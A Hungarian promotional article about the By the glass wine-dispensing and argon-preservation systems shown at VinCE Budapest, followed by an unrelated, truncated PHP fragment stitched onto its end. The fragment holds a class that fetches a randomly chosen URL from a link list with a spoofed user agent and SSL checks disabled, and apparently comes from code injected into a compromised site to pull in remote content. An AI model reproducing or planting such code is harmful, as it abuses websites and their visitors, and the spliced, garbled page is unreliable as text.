By the glass


By the glass® a VinCE Budapesten

Grandiózus boreseményünk vendégei már megszokhatták, hogy minden alkalommal valamilyen újdonsággal állunk elő – az idei év egyik legnagyobb szenzációja kétségtelenül a By the glass® terme lesz, ahol a magyar fajtákat tanulmányozhatjuk 20 Modular rendszer segítségével, azaz 40 állomás áll majd azok rendelkezésére, akik ki szeretnék próbálni a By the glass® innovációját. Furmint, juhfark, kékfrankos – mind tökéletes hőmérsékleten, egyetlen gombnyomásra kerül a poharunkba, a három nap bármelyik órájában mindig frissen, hibátlan állapotban. Telefonunk segítségével pedig (e-mail címmel vagy Facebook-profillal regisztrálva) beléphetünk a By the glass® SmartWine applikációjába, amellyel értékelhetjük a bort, megoszthatjuk ismerőseinkkel, és a kóstolt borok adatait később is bármikor visszanézhetjük.
A By the glass® terem a Corinthia Budapest Hotel földszintén várja látogatóit. A belépés napijegy birtokában ingyenes lesz, de egyszerre csak korlátozott számú vendég tartózkodhat a teremben a kényelmes kóstolás miatt – megértésüket előre is köszönjük. Idén itt lesz a pohárátvételi pont is, tehát ideális kiindulópontjaként szolgál majd a VinCE Budapesthez.

By-The-Glass-11

Egy pohár innovációt?

A By the glass® hazai premiere

Boradagoló és -megőrző gépeket elvétve láthattunk már hazai borbárokban vagy akár a VinCE Balatonon is, a holland By the glass® rendszereit azonban ez idáig itthon nem csodálhattuk meg – a világ 41 országában viszont igen, Brazíliától Szingapúrig. Az innovációban élen járó By the glass® megalkotta a világ első okostelefonnal kommunikáló boradagoló és -megőrző rendszerét, amelyet itthon először a VinCE Budapest vendégei próbálhatnak ki!

Az oxigén az ember számára éltető elem, a bornak azonban gyilkos méreg, amely lassan, de biztosan elemészti. Először alig észrevehető károkat okoz, aztán oxigénnek kitett borunk elveszíti minden szépségét, „szétesik” és élvezhetetlenné válik. Próbálkozhatunk a palack gyors visszazárásával, de nem lehetünk elég gyorsak: a kibontott palack pillanatok alatt megtelik oxigénnel. Az egyetlen biztos módszer, ha nem hagyunk időt az oxigén rombolásának, megisszuk az egész palackot – ez azonban egy borbár vagy borászat esetében aligha vezet nyereséghez… A problémát felismerő tudósok rájöttek, hogy a katasztrófa megelőzhető az oxigénnél nehezebb nemesgáz, például az argon befecskendezésével, a nemesgázréteg ugyanis „ráül” a borra, és nem engedi, hogy találkozzon a gonosz természetű oxigénnel. A modern boradagoló és -megőrző rendszerek a kézi pumpákkal és kézi nitrogénadagolókkal szemben ezt hatékonyan oldják meg, másik előnyük pedig a tökéletes hőmérséklet, illetve a pontos adagolás. Mindezek apróságnak tűnnek, de épp az ilyen apróságok miatt választja az igényes borkedvelő az egyik borbár helyett a másikat.

 

Mennyit dob ki az ablakon?

Feltételezzük, hogy a jó borbár tulajdonosa nem visz ki a vendégnek olyan bort, ami már nincs a legjobb formájában, így azonban nem kevés bort kell a csapba önteni, hiszen lehetetlen megjósolni, hogy mikor melyik tételből kérnek többet. Az is megoldás lehet, ha kevesebb tételt tart nyitva, de az emberek éppen a pohárral is kapható tételek száma miatt mennek borbárba, a kisebb választék miatt hosszú távon vendégeket veszít. E sorok írója nemrég külföldi borszakértő vendégeket vitt egy ismert budai borbárba, és sajnos az egyik pohár bor elöregedett, ihatatlan volt. A sommelier készségesen kicserélte, az újonnan bontott palackból töltött bor és a korábbi közti különbség ég és föld volt, de késő bánat, a következő külföldi csapatot oda biztosan nem visszük. Biztosan mennek majd mások, kevésbé minőségérzékenyek, a közönség szép lassan átalakul, és a legolcsóbb ház bora lesz a legkeresettebb tétel. Ha viszont egy borbár tulajdonosa bölcs előrelátással már nyitáskor beruház boradagoló rendszerbe, akkor – akárcsak egy jókor elvégzett apasági teszttel – egyszeri költséggel számtalan csapba öntött palackot vagy elvesztett vendéget spórolhat meg.

Mindez pontosan így van a borászatok esetében is, sőt náluk talán még nagyobb haszna lehet egy boradagoló és -megőrző rendszernek, hiszen előfordulhat, hogy napokig nem keresi fel senki a pincét, a hétvégén megbontott palackok a következő szombatot nem érik meg bontott állapotban, és jobb híján megint csak marad a „majd mi megisszuk” hozzáállás. Nézzük, hogy a By the glass® mit ajánl boraik megmentése érdekében!

 

Standard és Modular

A By the glass® Standard rendszerei 6-tól 20 palackos kiszerelésig kaphatók, a palackok állhatnak egy vagy két sorban, de akár a hideg levegő befújásának irányát is megválaszthatjuk. Kapható többféle színben, akár tölgyfa borítással is. A Modular rendszer – ahogy a neve is jelzi – modulokból áll. A By the glass® a piaci igényeket figyelve arra jött rá, hogy a legtöbb vállalkozás szívesebben invesztál kis lépésenként, a Modular rendszer pedig pont ezt a szabadságot adja meg: a viszonylag kicsi, kétpalackos adagoló kis helyen elfér, az ára mérsékelt, és bármikor, bármeddig könnyedén bővíthető. A könnyen tisztítható, egyszerűen kezelhető Modular borkedvelők számára, otthoni használatra is ideális – a mindössze 25 cm széles, 69 cm magas és 23 cm mély, 22 kilós készülék beépíthető a konyhapultba (a ventillátor elöl van), de szabadon állva is kifejezetten jól mutat. A beépített LED-lámpák erőssége is szabályozható: boraink ragyoghatnak teljes fényben, amíg megmutatjuk a vendégnek, de állíthatjuk energiakímélő halvány világításra is.

A gépeket működtethetjük elektronikus kártyával, összeköthetők pénztárgéppel vagy webshoppal is.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>